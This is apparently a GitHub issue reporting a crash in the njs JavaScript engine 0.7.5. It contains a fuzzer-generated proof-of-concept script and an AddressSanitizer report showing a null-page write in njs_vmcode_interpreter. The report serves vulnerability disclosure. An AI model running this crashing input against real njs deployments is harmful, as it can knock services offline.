You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Commit : c62a9fb92b102c90a66aa724cb9054183a33a68c
Version : 0.7.5
Build :
./configure --cc=clang --address-sanitizer=YES
make
Proof of concept
// Minimizing 6789E152-A951-4E52-897A-6064FED934A6
function placeholder(){}
function main() {
async function v0(v1,v2,v3) {
var v5 = await ReferenceError;
function v6(v7,v8) {
var v10 = [-904640.292473976];
var v12 = [956755363,956755363,956755363,956755363,956755363];
v12[1323912014] |= v10;
var v20 = `
var v21 = Object(-9007199254740993,-4027512271n);
`;
var v26 = `
var v27 = (-256n)(-9007199254740993,-4027512271n);
`;
var v37 = `
Object[-4027512271] **= -4027512271n;
var v39 = Object(-9007199254740993,...-65536n);
`;
var v43 = `
var v44 = Object(-9007199254740993,-4027512271n);
`;
var v47 = `
var v48 = Object(-9007199254740993,-9007199254740993n);
`;
var v52 = `
var v53 = undefined(-1290018985n,-4027512271n);
`;
var v59 = [-1000000.0,-1000000.0,-1000000.0];
var v67 = `
var v68 = (-1.7976931348623157e+308)(8980,-4027512271n);
`;
var v69 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v70 = Object(0n,-4027512271n);
`;
function v76(v77) {
v77[1866532165] = Map;
}
function v78(v79,v80) {
var v87 = new Uint8ClampedArray();
var v90 = {};
var v91 = /gL8?/;
var v92 = {};
var v93 = [v90,v92,v91];
function v95(v96) {
v93[1866532165] = Map;
}
async function v99(v100,v101) {
var v102 = await Map;
}
function v103(v104,v105) {
}
var v107 = new Promise(v103);
var v109 = v107["catch"]();
var v112 = {"get":Promise,"set":v99};
var v113 = Object.defineProperty(v109,"constructor",v112);
async function v114(v115,v116) {
var v117 = await v113;
}
var v118 = v114();
var v119 = v95(Map);
var v120 = String();
var v131 = `
var v132 = Object(-9007199254740993,-4027512271n);
`;
var v133 = `
(-4027512271n)[-4027512271] **= -4027512271n;
`;
var v139 = `
var v141 = [-4027512271n,Object,-4027512271n,1,v87,-4027512271n,Object,Uint8ClampedArray,8980,Object];
var v142 = Object();
v142[-4027512271] **= -4027512271n;
`;
var v149 = `
var v150 = Object(-9007199254740993,-4027512271n,0,-4027512271n);
`;
var v157 = `
var v158 = Object(-9007199254740993,-4027512271n,15034n);
`;
var v161 = `
var v162 = Object(-4294967296,-4027512271n);
`;
var v170 = `
var v171 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v181 = `
Object[-4027512271] **= -4027512271n;
var v183 = Object(-9007199254740993,-4027512271n);
`;
var v185 = `
var v186 = Object(-9007199254740993,-9007199254740993n);
`;
var v190 = `
var v191 = undefined(-4027512271n,-4027512271n);
`;
var v196 = `
var v197 = "bigint"();
v197[-4027512271] **= -4027512271n;
var v198 = Object(-4027512271n,-4027512271n);
`;
var v199 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v200 = Object(-9007199254740993,-4027512271n);
`;
var v204 = `
var v205 = ReferenceError(-4027512271n,-4027512271n);
`;
var v208 = Float64Array();
var v213 = `
v208[-4027512271] **= -4027512271n;
var v214 = Object(-9007199254740993,-4027512271n);
`;
var v215 = `
var v216 = Object(-4027512271n,-4027512271n);
`;
var v220 = `
var v221 = (-1070059123)(-9007199254740993,-4027512271n);
`;
var v222 = `
var v223 = ArrayBuffer(-4027512271n,-9007199254740993n);
`;
var v229 = `
var v230 = undefined(-4027512271n,-4027512271n,Uint8ClampedArray,8980,-4027512271n);
`;
var v235 = `
var v236 = (-4027512271n)();
var v237 = v236(0n,-4027512271n);
`;
var v241 = `
var v243 = Object();
v243[-1316174388] >>= -4027512271n;
var v245 = Object["getPrototypeOf"](v120,-4027512271n);
var v246 = Object(-4027512271n,-4027512271n);
`;
var v247 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v248 = Symbol(-9007199254740993,-4027512271n);
`;
Promise[-4294967297] = Map;
}
var v250 = new Promise(v78);
var v258 = Object();
var v259 = `
var v260 = Object(-9007199254740993,-4027512271n);
`;
var v261 = `
var v262 = v261();
v262[-4027512271] **= -4027512271n;
var v263 = Object(v258,-4027512271n);
`;
var v264 = `
Object[-4027512271] **= -4027512271n;
var v266 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v270 = `
var v271 = (-4027512271n)(-9007199254740993,-2147483649n);
`;
var v274 = `
var v275 = (-4027512271n)(v59,-4027512271n);
`;
var v281 = `
var v282 = Error(-9007199254740993,3272380054n,Uint8ClampedArray,8980,0n);
`;
var v286 = `
var v287 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v288 = `
var v290 = Object();
v290[-4027512271] **= -767560483n;
var v291 = Object(-4027512271n,-3242169687n);
`;
var v292 = `
(-4027512271n)[-4027512271] **= -4027512271n;
var v293 = Object(-9007199254740993,-4027512271n);
`;
var v297 = `
var v298 = (-9007199254740993)();
v298[-4027512271] **= -4027512271n;
var v299 = v298(0n,-4027512271n);
`;
var v304 = `
undefined[-4027512271] **= -4027512271n;
var v305 = Object(...-2691822435,2828643507n);
`;
var v306 = AggregateError(v12);
}
function v307(v308,v309) {
var v310 = v308();
var v311 = v307(v309,v6);
}
var v313 = new Promise(v307);
}
var v314 = v0();
}
main();
// CRASH INFO
// ==========
// TERMSIG: 11
Stack dump
AddressSanitizer:DEADLYSIGNAL
=================================================================
==9460==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x000000505060 bp 0x7ffc53e30aa0 sp 0x7ffc53e302e0 T0)
==9460==The signal is caused by a WRITE memory access.
==9460==Hint: address points to the zero page.
#0 0x505060 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1006:37
#1 0x660085 in njs_await_fulfilled /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_async.c:91:11
#2 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
#3 0x573b30 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
#4 0x573b30 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11
#5 0x64c5f3 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12
#6 0x64c5f3 in njs_promise_reaction_job /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:1171:15
#7 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
#8 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
#9 0x4f9c12 in njs_vm_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:428:12
#10 0x4f9c12 in njs_vm_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:412:12
#11 0x4f9c12 in njs_vm_handle_events /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:572:19
#12 0x4f9c12 in njs_vm_run /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:532:12
#13 0x4df763 in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1172:15
#14 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
#15 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
#16 0x7ff15c0cf082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
#17 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1006:37 in njs_vmcode_interpreter
==9460==ABORTING
Environment
Proof of concept
Stack dump
Credit
dramthy(@topsec alpha)
The text was updated successfully, but these errors were encountered: